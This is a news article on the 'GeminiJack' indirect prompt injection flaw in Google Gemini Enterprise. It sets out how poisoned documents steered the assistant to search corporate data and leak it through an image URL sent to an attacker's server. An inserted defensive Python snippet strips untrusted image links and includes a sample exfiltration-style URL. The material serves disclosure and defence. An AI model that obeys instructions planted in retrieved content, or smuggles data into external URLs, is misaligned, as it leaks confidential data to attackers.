Google's Gemini Enterprise Flaw: How Hackers Could Access Corporate Data (2026)

Corporate data is under siege, and this time, the threat comes from an unexpected source: AI assistants. A recently discovered flaw in Google’s Gemini Enterprise could have silently siphoned sensitive information from businesses without anyone clicking a single link. But here’s where it gets even more alarming: this isn’t just a one-off issue—it’s a wake-up call about the growing risks of indirect prompt injection in corporate AI systems.

In June 2025, security researchers at Noma Security uncovered a critical vulnerability they dubbed ‘GeminiJack.’ This architectural weakness affected Google Gemini Enterprise, a suite of AI-powered tools for businesses, and Vertex AI Search, a Google Cloud platform for building AI-driven search experiences. The flaw allowed attackers to inject malicious instructions into everyday documents like emails, calendars, and Google Docs, tricking the AI into leaking corporate data without triggering any security alerts.

And this is the part most people miss: the attack didn’t require any interaction from employees. All it took was a cleverly crafted document containing hidden instructions. Here’s how the attack chain unfolded:

  1. Content Poisoning: An attacker creates an innocent-looking document, email, or calendar event with embedded instructions for Gemini Enterprise to search for sensitive terms and embed results in a malicious image URL.
  2. Trigger: An unsuspecting employee performs a routine search, unknowingly activating the AI to process the attacker’s poisoned content.
  3. AI Execution: Gemini retrieves the attacker’s document, misinterprets the instructions as legitimate, and scans authorized data sources for sensitive information.
  4. Exfiltration: The AI includes the attacker’s malicious image tag in its response. When loaded, the victim’s browser sends the stolen data to the attacker’s server via a standard HTTP request, bypassing traditional security measures.
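A defensive check against step 4, as an added example (not taken from Noma Security's report or from Google's fix): before an assistant response is rendered, image references pointing at hosts outside an allowlist are removed and recorded for review. The allowlisted hosts, the function names and the sample response are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this deployment trusts to serve images in rendered answers.
ALLOWED_IMAGE_HOSTS = {"static.example.com", "intranet.example.com"}

# Markdown images ![alt](url) and HTML <img ... src="url">.
MD_IMG = re.compile(r'!\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)')
HTML_IMG = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.I)


def inspect_image(url):
    """Return (allowed, host, query_len) for one image URL."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
    except ValueError:  # malformed URL: treat as untrusted
        return False, None, 0
    if not parts.scheme and not parts.netloc:
        return True, host, 0  # relative path, served by the app itself
    allowed = parts.scheme == "https" and host in ALLOWED_IMAGE_HOSTS
    return allowed, host, len(parts.query)


def sanitize_response(text):
    """Return (safe_text, findings); blocked images never reach the browser."""
    findings = []

    def _check(match):
        allowed, host, query_len = inspect_image(match.group(1))
        if allowed:
            return match.group(0)
        # A long query string on an unknown host suggests data carried out.
        findings.append({"host": host, "query_bytes": query_len})
        return "[image removed: untrusted host]"

    text = MD_IMG.sub(_check, text)
    text = HTML_IMG.sub(_check, text)
    return text, findings


# Constructed sample of a poisoned answer; host and query string are made up.
SAMPLE = (
    "Here are the Q3 results you asked for.\n"
    '<img src="https://collector.example.net/p.png?d=budget%20figures%20Q3">\n'
    "![logo](https://intranet.example.com/static/logo.png)\n"
)

if __name__ == "__main__":
    print(sanitize_response(SAMPLE))
```

The findings list can feed the monitoring pipeline, and the same allowlist can be enforced in the browser with a Content-Security-Policy `img-src` directive.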

This exploit worked because Gemini Enterprise’s search feature uses a Retrieval-Augmented Generation (RAG) architecture, which allows organizations to query multiple data sources within Google Workspace. But here’s the controversial part: while RAG enhances AI capabilities, it also expands the attack surface. As Noma Security researchers explained, ‘Organizations must pre-configure which data sources the RAG system can access, creating a persistent trust boundary. Attackers exploit this boundary by planting malicious instructions within content retrieved by the AI.’

Noma Security released a detailed proof-of-concept (PoC) exploit for GeminiJack in their December 8 report, highlighting the urgency of addressing this vulnerability. Google, to its credit, acted swiftly. After receiving the report in August, the tech giant updated Gemini Enterprise and Vertex AI Search, altering how they interact with retrieval and indexing systems. Vertex AI Search was also fully separated from Gemini Enterprise, eliminating shared workflows and RAG capabilities.

However, Noma Security warns that this won’t be the last attack of its kind. Traditional security tools like perimeter defenses and data loss prevention systems are ill-equipped to detect AI-driven exfiltration. As AI assistants gain more access to corporate data, the potential damage from a single vulnerability grows exponentially. Organizations must rethink trust boundaries, implement robust monitoring, and stay informed about emerging AI security threats.

The UK’s National Cyber Security Centre (NCSC) recently issued new guidance on mitigating prompt injection attacks, underscoring the need for proactive measures. But the question remains: Are businesses ready to adapt their security strategies for an AI-driven threat landscape?

Author: Duane Harber
